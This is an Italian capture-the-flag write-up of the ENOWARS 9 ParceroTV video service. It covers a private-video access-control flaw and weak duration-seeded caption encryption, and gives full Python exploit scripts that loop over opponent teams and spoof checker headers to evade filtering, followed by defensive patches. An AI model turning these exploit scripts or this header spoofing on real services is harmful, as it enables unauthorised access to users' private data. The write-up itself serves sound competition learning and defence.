ENOWARS 9 đŠ
ParceroTV đ
Panoramica
ParceroTV era unâapplicazione web di condivisione video, simile a una versione in piccolo di YouTube, sviluppata con un backend in Rust usando il framework Actix-web e un database SQLite. Il servizio permetteva agli utenti di registrarsi, effettuare il login e caricare video e âshortsâ. I video potevano essere contrassegnati come pubblici o privati, e gli utenti potevano creare playlist, commentare i video e visualizzare i profili di altri utenti. Lâapplicazione includeva anche una funzionalitĂ âshortsâ con didascalie auto-generate in spagnolo.
Analisi e vulnerabilitĂ
Il servizio conteneva due vulnerabilitĂ critiche: un problema di Broken Access Control che consentiva lâaccesso ai video privati di altri utenti, e unâimplementazione di crittografia insicura nel sistema di didascalie degli shorts.
VulnerabilitĂ 1: Broken Access Control nellâAPI dei video privati
La vulnerabilitĂ principale si trovava nellâendpoint API responsabile del recupero dei video privati di un utente: /get_private_videos/{user_id}
. Lâhandler per questa rotta prendeva lâID utente direttamente dal percorso URL e lo usava per interrogare il database alla ricerca di tutti i video privati associati.
Il difetto critico era il totale assenza di controlli di autorizzazione. Il codice non verificava se il user_id
fornito nellâURL corrispondesse al user_id
dellâutente autenticato memorizzato nella sessione. Questo significava che qualsiasi utente loggato poteva enumerare e accedere ai metadati dei video privati di un altro utente semplicemente indovinando o recuperando il suo ID utente.
Ă stato reso trivialmente semplice grazie a un altro endpoint, /get_user_info_with_name/{name}
, che restituiva le informazioni di un utente, incluso il suo ID, basandosi sul suo nome utente.
Il percorso dâexploit era il seguente:
- Un attaccante registra un nuovo account sulla piattaforma.
- Lâattaccante usa lâendpoint
/get_user_info_with_name/{victim_username}
per ottenere lâunicouser_id
della vittima. - Lâattaccante invia una richiesta a
/get_private_videos/{victim_user_id}
. - LâAPI autorizza in modo improprio la richiesta e restituisce un oggetto JSON contenente i metadati di tutti i video privati della vittima, uno dei quali conteneva il flag nascosto nel campo di descrizione, codificato in Brainfuck.
VulnerabilitĂ 2: Crittografia insicura nelle didascalie degli shorts
La seconda vulnerabilitĂ riguardava la funzionalitĂ âshortsâ. Quando un utente caricava uno short con didascalie, il backend le âtraducevaâ in spagnolo e le salvava come file .vtt
. Questo processo prevedeva uno schema di crittografia personalizzato.
Lâanalisi dello script di exploit NPI_hecker404_parceroTV_shorts.py
e del codice sorgente del backend (shorts_lib.rs
) ha rivelato che la crittografia era gravemente difettosa:
- Generazione di chiave prevedibile: la chiave di crittografia ChaCha20 a 256 bit era derivata direttamente dalla durata dello short in secondi (un valore
float
). Questo valore veniva convertito in millisecondi e utilizzato come seed. CosĂŹ si creava uno spazio di chiavi estremamente piccolo e prevedibile, rendendo banale un attacco brute-force con valori di durata comuni. - Codifica personalizzata: prima della crittografia, il testo in chiaro veniva codificato in una serie di parole spagnole usando un dizionario fisso di 4096 parole (
spanish_words.txt
). Ogni parola rappresentava un blocco di 12 bit dei dati originali.
Il percorso dâexploit era:
- Lâattaccante individua uno short con didascalie tramite lâendpoint
/get_shorts
. - Scarica il file di didascalie cifrate
.vtt
. - Esegue il reverse della codifica in parole spagnole per ottenere il ciphertext grezzo.
- Esegue un brute-force della durata del video (lo script di exploit ha usato con successo valori come
4.6
e2.5
secondi) per generare la chiave ChaCha20 corretta. - Con la chiave corretta, decritta il ciphertext per rivelare il payload Brainfuck contenente il flag.
Exploit
Qui puoi leggere gli script di exploit che ho scritto con NPI.
#!/bin/env python3
from pwn import *
import requests
import sys
import json
import string
import random
service_name = 'parceroTV'
ip = sys.argv[1]
alph = string.ascii_uppercase + string.digits
if service_name:
attacksjson = requests.get(f'https://9.enowars.com/scoreboard/attack.json').json()
getid = attacksjson['services'][service_name][ip]
def add_metadata(input_path: str,
output_path: str,
title: str = None,
artist: str = None,
genre: str = None) -> None:
cmd = ["ffmpeg", "-i", input_path]
if title:
cmd += ["-metadata", f"title={title}"]
if artist:
cmd += ["-metadata", f"artist={artist}"]
if genre:
cmd += ["-metadata", f"genre={genre}"]
cmd += ["-c", "copy", output_path]
subprocess.run(cmd, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def brainfuck(input):
...
return output
def attack(fid=None):
try:
username_f = fid['0'][0]
URL = f'http://{ip}:7777'
assert username_f is not None, "User ID must be set"
username, password = ''.join(random.choices(alph, k=12)), ''.join(random.choices(alph, k=12))
s = requests.Session()
s.headers.update({'User-Agent': 'python-httpx/0.23.3', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'})
s.get(URL)
s.post(URL + '/newuser', data={'username': username, 'password': password})
s.post(URL + '/checkcredentials', data={'username': username, 'password': password})
userid = s.get(URL + f'/get_user_info_with_name/{username_f}').json()['id']
video = s.get(URL + f'/get_private_videos/{userid}').json()[0]
a = f'metadata_{video['name']}_{''.join(random.choices(string.digits, k=4))}.mp4'
m = [
video['name'],
username_f,
video['location']
]
add_metadata('video.mp4', a, title=m[0], artist=m[1], genre=m[2])
s.post(URL + '/app/create_video', data={
'name': video['name'],
'description': os.urandom(12).hex(),
'is_private': 1,
'location': video['location'],
}, files={
'file': open(a, 'rb'),
'thumbnail': open('thumbnail.png', 'rb')
})
print(f'{a}', flush=True)
path = '/get_video_info/' + s.get(URL + '/get_my_videos').json()[0]['path']
print(brainfuck(s.get(URL + path).json()['description']), flush=True)
except:
pass
if getid:
for round in getid:
attack(getid[round])
else:
attack()
E
#!/usr/bin/env python3
import requests, re, sys, random, string
from pathlib import Path
from typing import List, Dict, Set
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms
from cryptography.hazmat.backends import default_backend
PER_LETTER = 4096 // 26
alph = string.ascii_uppercase + string.digits
def brainfuck(input):
...
return output
def build_spanish_words(path: str = "spanish_words.txt") -> List[bytes]:
raw = Path(path).read_bytes()
all_words = [w.strip() for w in raw.splitlines() if w.strip()]
groups: Dict[bytes, List[bytes]] = {}
for w in all_words:
first = w[0:1].lower()
if b'a' <= first <= b'z':
groups.setdefault(first, []).append(w)
used: Set[bytes] = set()
result: List[bytes] = []
for letter_ord in range(ord(b'a'), ord(b'z') + 1):
letter = bytes([letter_ord])
bucket = groups.get(letter, [])
for w in bucket[:PER_LETTER]:
if w not in used:
used.add(w)
result.append(w)
for w in all_words:
if len(result) >= 4096:
break
if w not in used:
used.add(w)
result.append(w)
if len(result) != 4096:
raise ValueError(f"Expected 4096 words, got {len(result)}")
return result
def decrypt_spanish_stream(
cipher_words: List[bytes],
duration_secs: float,
words_file: str = "spanish_words.txt"
) -> str:
table = build_spanish_words(words_file)
inv_table = {w: i for i, w in enumerate(table)}
bit_buf = 0
bit_count = 0
cipher_bytes = bytearray()
for w in cipher_words:
try:
idx = inv_table[w]
except KeyError:
# Questa situazione non dovrebbe verificarsi con la corretta gestione dei byte
continue
if idx >= 4096:
raise ValueError(f"Word index out of range: {idx}")
bit_buf = (bit_buf << 12) | idx
bit_count += 12
while bit_count >= 8:
bit_count -= 8
byte = (bit_buf >> bit_count) & 0xFF
cipher_bytes.append(byte)
ms = int(round(duration_secs * 1000.0))
if ms == 0:
ms = 1
seed = ms.to_bytes(8, "little") + b"\x00" * 24
key = seed
nonce = b"\x00" * 16
cipher = Cipher(algorithms.ChaCha20(key, nonce), mode=None, backend=default_backend()).encryptor()
keystream = cipher.update(b"\x00" * len(cipher_bytes) * 8)
plain_bytes = bytearray()
for i, cb in enumerate(cipher_bytes):
kb = keystream[i * 8]
plain_bytes.append(cb ^ kb)
return plain_bytes.decode("utf-8", errors="ignore")
session = requests.Session()
session.headers.update({'User-Agent': 'python-httpx/0.23.3', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Connection': 'keep-alive'})
def extract_vtt_text(vtt_content: bytes) -> List[bytes]:
lines = vtt_content.splitlines()
text_lines = []
for line in lines:
if re.match(br'^\d+$', line):
continue
if re.match(br'^\d{2}:\d{2}:\d{2}\.\d{3} --> \d{2}:\d{2}:\d{2}\.\d{3}$', line):
continue
if line.strip() == b"":
continue
if line.startswith(b'WEBVTT'):
continue
text_lines.append(line.strip())
# Unisce tutte le linee di testo e poi le suddivide in parole
full_text = b' '.join(text_lines)
return full_text.split()
assert len(sys.argv) == 2
TEAM_IP = sys.argv[1]
service_name = 'parceroTV'
attacksjson = requests.get(f'https://9.enowars.com/scoreboard/attack.json').json()['services'][service_name][TEAM_IP]
URL = f'http://{TEAM_IP}:7777'
for rnd in attacksjson.items():
vtt_file = rnd[1]['1'][0]
username, password = ''.join(random.choices(alph, k=12)), ''.join(random.choices(alph, k=12))
session.get(URL)
session.post(URL + '/newuser', data={'username': username, 'password': password})
session.post(URL + '/checkcredentials', data={'username': username, 'password': password})
r = session.get(URL + '/get_shorts').json()
c = None
for i in r:
if i['name'] == vtt_file:
c = i['caption_path']
break
if c:
vtt_raw = session.get(URL + c).content
encrypted = extract_vtt_text(vtt_raw)
durations = [4.6, 2.5]
for d in durations:
f = decrypt_spanish_stream(encrypted, d, words_file="spanish_words.txt")
if f.startswith('@') and f.endswith('@'):
print(brainfuck(f), flush=True)
Patch
Le modifiche git in staging mostrano che la vulnerabilità di Broken Access Control è stata corretta in backend/src/main.rs
.
-
Correzione per lâaccesso ai video privati: la funzione
get_private_videos_by_userid
è stata modificata per includere un controllo di autorizzazione essenziale. Ora confronta iluser_id
della sessione con quello nellâURL. Se non corrispondono, la richiesta viene respinta.--- a/backend/src/main.rs +++ b/backend/src/main.rs @@ -654,8 +654,11 @@ async fn get_private_videos_by_userid( pool: web::Data<Pool>, user_id: web::Path<i32>, ) -> Result<impl Responder, Error> { if let Ok(Some(_user_id)) = session.get::<i32>("user_id") { - let conn = get_db_conn(&pool).await?; let user_id = user_id.into_inner(); + if _user_id != user_id { + return Ok(redirect!("/no_permission")); + } + let conn = get_db_conn(&pool).await?; let videoss = web::block(move || select_private_videos_by_userid(conn, user_id)) .await? .map_err(error::ErrorInternalServerError)?;
-
Defesa-in-depth per le informazioni video: un controllo analogo è stato aggiunto allâendpoint
/get_video_info/{path:.*}
. Questa patch garantisce che solo il proprietario di un video possa ottenere i suoi metadati dettagliati, prevenendo ulteriori fughe di informazioni anche se un attaccante trovasse unâaltra via per accedere al percorso del video.--- a/backend/src/main.rs +++ b/backend/src/main.rs @@ -738,6 +741,9 @@ async fn get_video_info( let video_info = web::block(move || select_video_by_path(conn, &path)) .await? .map_err(error::ErrorInternalServerError)?; + if video_info.userId != user_id { + return Ok(redirect!("/no_permission")); + } Ok(HttpResponse::Ok().json(video_info)) } } else {
Non sono state trovate patch negli staged changes per la vulnerabilitĂ di crittografia insicura nel sistema di didascalie degli shorts, il che suggerisce che potrebbe essere stata trascurata o prevista in un commit successivo.
Difesa a livello di rete
Oltre alle patch a livello di codice, è stata implementata una difesa a livello di rete. Abbiamo configurato il reverse proxy per ispezionare le richieste HTTP in arrivo. Identificando il User-Agent
e altri header specifici utilizzati dal checker del gioco, abbiamo creato una regola di filtraggio. Qualsiasi richiesta al servizio che non corrispondesse al profilo di header del checker veniva bloccata. Questo ha mitigato efficacemente attacchi semplici automatizzati, costringendo gli avversari a costruire exploit piĂš sofisticati in grado di emulare correttamente il traffico del checker, come dimostrato dagli header User-Agent
presenti negli script di exploit forniti.